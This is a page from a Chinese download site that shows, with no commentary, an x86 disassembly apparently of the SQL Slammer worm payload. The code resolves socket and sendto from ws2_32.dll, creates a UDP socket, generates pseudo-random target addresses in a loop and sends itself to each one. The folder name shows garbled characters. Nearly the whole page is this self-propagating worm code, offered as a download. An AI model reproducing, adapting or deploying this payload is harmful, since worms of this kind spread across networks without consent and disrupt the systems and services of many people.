⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 disassembly.txt

📁 SLAMMER芑愿戢盂&#30721
💻 TXT
字号:
00000000  90                nop00000001  90                nop00000002  90                nop00000003  90                nop00000004  90                nop00000005  90                nop00000006  90                nop00000007  90                nop00000008  68DCC9B042        push dword 0x42b0c9dc0000000D  B801010101        mov eax,0x101010100000012  31C9              xor ecx,ecx00000014  B118              mov cl,0x1800000016  50                push eax00000017  E2FD              loop 0x1600000019  3501010105        xor eax,0x50101010000001E  50                push eax0000001F  89E5              mov ebp,esp00000021  51                push ecx00000022  682E646C6C        push dword 0x6c6c642e00000027  68656C3332        push dword 0x32336c650000002C  686B65726E        push dword 0x6e72656b00000031  51                push ecx00000032  686F756E74        push dword 0x746e756f00000037  6869636B43        push dword 0x436b63690000003C  6847657454        push dword 0x5474654700000041  66B96C6C          mov cx,0x6c6c00000045  51                push ecx00000046  6833322E64        push dword 0x642e32330000004B  687773325F        push dword 0x5f32737700000050  66B96574          mov cx,0x746500000054  51                push ecx00000055  68736F636B        push dword 0x6b636f730000005A  66B9746F          mov cx,0x6f740000005E  51                push ecx0000005F  6873656E64        push dword 0x646e657300000064  BE1810AE42        mov esi,0x42ae101800000069  8D45D4            lea eax,[ebp-0x2c]0000006C  50                push eax0000006D  FF16              call near [esi]0000006F  50                push eax00000070  8D45E0            lea eax,[ebp-0x20]00000073  50                push eax00000074  8D45F0            lea eax,[ebp-0x10]00000077  50                push eax00000078  FF16              call near [esi]0000007A  50                push eax0000007B  BE1010AE42        mov esi,0x42ae101000000080  8B1E              mov ebx,[esi]00000082  8B03              mov eax,[ebx]00000084  3D558BEC51        cmp eax,0x51ec8b5500000089  7405              jz 0x900000008B  BE1C10AE42        mov esi,0x42ae101c00000090  FF16              call near [esi]00000092  FFD0              call eax00000094  31C9              xor ecx,ecx00000096  51                push ecx00000097  51                push ecx00000098  50                push eax00000099  81F10301049B      xor ecx,0x9b0401030000009F  81F101010101      xor ecx,0x1010101000000A5  51                push ecx000000A6  8D45CC            lea eax,[ebp-0x34]000000A9  50                push eax000000AA  8B45C0            mov eax,[ebp-0x40]000000AD  50                push eax000000AE  FF16              call near [esi]000000B0  6A11              push byte +0x11000000B2  6A02              push byte +0x2000000B4  6A02              push byte +0x2000000B6  FFD0              call eax000000B8  50                push eax000000B9  8D45C4            lea eax,[ebp-0x3c]000000BC  50                push eax000000BD  8B45C0            mov eax,[ebp-0x40]000000C0  50                push eax000000C1  FF16              call near [esi]000000C3  89C6              mov esi,eax000000C5  09DB              or ebx,ebx000000C7  81F33C61D9FF      xor ebx,0xffd9613c000000CD  8B45B4            mov eax,[ebp-0x4c]000000D0  8D0C40            lea ecx,[eax+eax*2]000000D3  8D1488            lea edx,[eax+ecx*4]000000D6  C1E204            shl edx,0x4000000D9  01C2              add edx,eax000000DB  C1E208            shl edx,0x8000000DE  29C2              sub edx,eax000000E0  8D0490            lea eax,[eax+edx*4]000000E3  01D8              add eax,ebx000000E5  8945B4            mov [ebp-0x4c],eax000000E8  6A10              push byte +0x10000000EA  8D45B0            lea eax,[ebp-0x50]000000ED  50                push eax000000EE  31C9              xor ecx,ecx000000F0  51                push ecx000000F1  6681F17801        xor cx,0x178000000F6  51                push ecx000000F7  8D4503            lea eax,[ebp+0x3]000000FA  50                push eax000000FB  8B45AC            mov eax,[ebp-0x54]000000FE  50                push eax000000FF  FFD6              call esi00000101  EBCA              jmp short 0xcd

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -